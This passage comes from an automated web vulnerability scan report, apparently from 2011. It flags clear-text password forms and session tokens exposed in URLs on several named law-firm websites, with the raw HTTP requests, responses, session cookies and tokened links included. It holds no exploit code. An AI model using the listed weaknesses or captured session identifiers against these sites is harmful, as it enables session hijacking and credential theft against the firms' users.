Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

3.3. http://www.fulbright.com/insite

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

3.4. http://www.fulbright.com/insite

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

3.5. http://www.political.cov.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.political.cov.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...
<div id="right_col_login_area">
                   Member Login
                   <form action="/login.cfm" method="POST" style="margin-top:7px; margin-bottom:0px;">
                       <div style="padding-bottom: 5px;">
...[SNIP]...
</div>
                                   <input type="password" class="small_text_box" name="password" maxlength="12" /></td>
...[SNIP]...

3.6. http://www.skadden.com/alumni/Index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /alumni/Index.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<td align="left" valign="top">
<form method="post" action="alumni_authenticate.cfm" id="loginFrm">

   <!--table-->
...[SNIP]...
<td valign="top" style="padding-bottom:6px;"><input class="formLogin" type="password" name="aPassword" maxlength="75" onkeypress="checkEnterAlumni(event)" /></td>
...[SNIP]...

4. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&amp;action=view&amp;id=420&amp;CFID=9488352&amp;CFTOKEN=58883300">Justin Antonipillai</a>
...[SNIP]...
</em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a>
...[SNIP]...
</em> named Arnold &amp; Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&amp;action=view&amp;id=29&amp;CFID=3285218&amp;CFTOKEN=60209382">Deborah Feinstein</a>
...[SNIP]...
</em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a>
...[SNIP]...
<p>Attorney General Eric Holder presented Arnold &amp; Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&amp;action=view&amp;id=424&amp;CFID=1875550&amp;CFTOKEN=71164531">Robert Pitofsky</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&amp;action=view&amp;id=5423&amp;CFID=476026&amp;CFTOKEN=73240865">Ginger Dreger</a>
...[SNIP]...
</em> named Arnold &amp; Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=417833&amp;CFTOKEN=96803455">William Baer</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=8038589&amp;CFTOKEN=38448975">William Baer</a>
...[SNIP]...
</a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&amp;action=view&amp;id=189&amp;CFID=8038589&amp;CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&amp;action=view&amp;id=716&amp;CFID=8038589&amp;CFTOKEN=38448975">John D. Hawke Jr.</a>
...[SNIP]...
ife sciences: regulatory, compliance &amp; competition; and product liability: mainly defendant; and was ranked as a "Leading Fi